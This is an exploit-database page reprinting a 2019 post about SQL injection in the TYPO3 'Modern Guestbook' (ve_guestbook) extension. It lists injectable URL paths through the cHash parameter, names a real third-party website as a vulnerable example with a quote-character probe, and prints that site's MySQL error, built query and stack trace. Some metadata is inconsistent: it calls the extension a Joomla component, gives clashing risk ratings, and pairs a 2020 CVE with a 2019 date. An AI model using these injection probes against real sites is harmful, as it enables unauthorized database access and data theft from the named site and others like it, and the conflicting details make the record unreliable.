Advertisement






Typo3 CMS Modern Guestbook tx_veguestbook_pi1 3.3.0 SQL Injection

CVE Category Price Severity
CVE-2020-24394 CWE-89 Not specified High
Author Risk Exploitation Type Date
exploitalert.com High Remote 2019-02-21
CPE
cpe:cpe:/a:typo3:typo3-cms:3.3.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020221

Below is a copy:

Typo3 CMS Modern Guestbook tx_veguestbook_pi1 3.3.0 SQL Injection
####################################################################

# Exploit Title : Typo3 CMS Modern Guestbook tx_veguestbook_pi1 3.3.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/02/2019
# Vendor Homepage : typo3.org
# Software Download Link : extensions.typo3.org/extension/download/ve_guestbook/3.3.0/zip/
# Software Information Link : extensions.typo3.org/extension/ve_guestbook/
# Software Version : From 1.8.0 To 3.3.0 - All Versions
Compatible with TYPO3 (7.6.0 - 7.9.99)
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Ve_guestbook is Typo3 Modern Guestbook extension 

authored by Simon Schaufelberger and Udo von Eynern.

####################################################################

# Impact :
***********
Typo3 Modern Guestbook tx_veguestbook_pi1 3.3.0 and other versions - 

component for Joomla is prone to an SQL-injection vulnerability because it 

fails to sufficiently sanitize user-supplied data before using it in an SQL query. 

Exploiting this issue could allow an attacker to compromise the application, 

access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application 

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************
/en/metanavigation/blog/blog-single-view/print.html?tx_veguestbook_pi1%5Bpointer%5D=[ID-NUMBER]&cHash=[SQL Injection]

/en/metanavigation/blog/blog-single-view.html?tx_veguestbook_pi1%5Bpointer%5D=[ID-NUMBER]&cHash=[SQL Injection]

/metanavigation/blog/blog-einzelansicht.html?tx_veguestbook_pi1%5Bpointer%5D=[ID-NUMBER]&cHash=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************
[+] zuerchertierschutz.ch/metanavigation/blog/blog-einzelansicht.html?tx_veguestbook_pi1%5Bpointer%5D=1&cHash=1%27

####################################################################

# Example SQL Database Error :
****************************

exec_SELECTquery
****************
caller
*******

TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery

ERRORYou have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near
 'AND tt_news.deleted=0 AND tt_news.t3ver_state<=0 
AND tt_news.pid<>-1 AND tt_news' at line 1

lastBuiltQuery
*************

SELECT * FROM tt_news WHERE uid = AND tt_news.deleted=0 AND 
tt_news.t3ver_state<=0 AND tt_news.pid<>-1 AND tt_news.hidden=0 AND 
tt_news.starttime<=1550702040 AND (tt_news.endtime=0 OR 
tt_news.endtime>1550702040) AND (tt_news.fe_group='' OR 
tt_news.fe_group IS NULL OR tt_news.fe_group='0' 
OR FIND_IN_SET('0',tt_news.fe_group) OR FIND_IN_SET('-1',tt_news.fe_group))

debug_backtrace
****************
require(tslib/index_ts.php),#28 // TYPO3\CMS\Frontend\Page\PageGenerator::renderContent#212 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#215
 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
 // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41 
// call_user_func_array#6663 // tx_templavoila_pi1->main_page# // tx_templavoila_pi1->renderElement#196 
// tx_templavoila_pi1->processDataValues#331 // TYPO3\CMS\Frontend\ContentObject
\ContentObjectRenderer->cObjGet#605 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer
->cObjGetSingle#697 // TYPO3\CMS\Frontend\ContentObject\RecordsContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#119 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734 
// TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectArrayContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#40 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697 
// TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734 
// TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#752 
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41 
// call_user_func_array#6663 // tx_veguestbook_pi1->main# // tx_veguestbook_pi1-
>displayForm#213 // tx_timtab_fe->extraItemMarkerProcessor#836 // tx_timtab_fe-
>main#422 // tx_timtab_fe->substituteMarkers#88 // tx_timtab_fe->getCurrentPost#175
 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTgetRows#275 
// TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#370 
// TYPO3\CMS\Core\Database\DatabaseConnection->debug#305

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.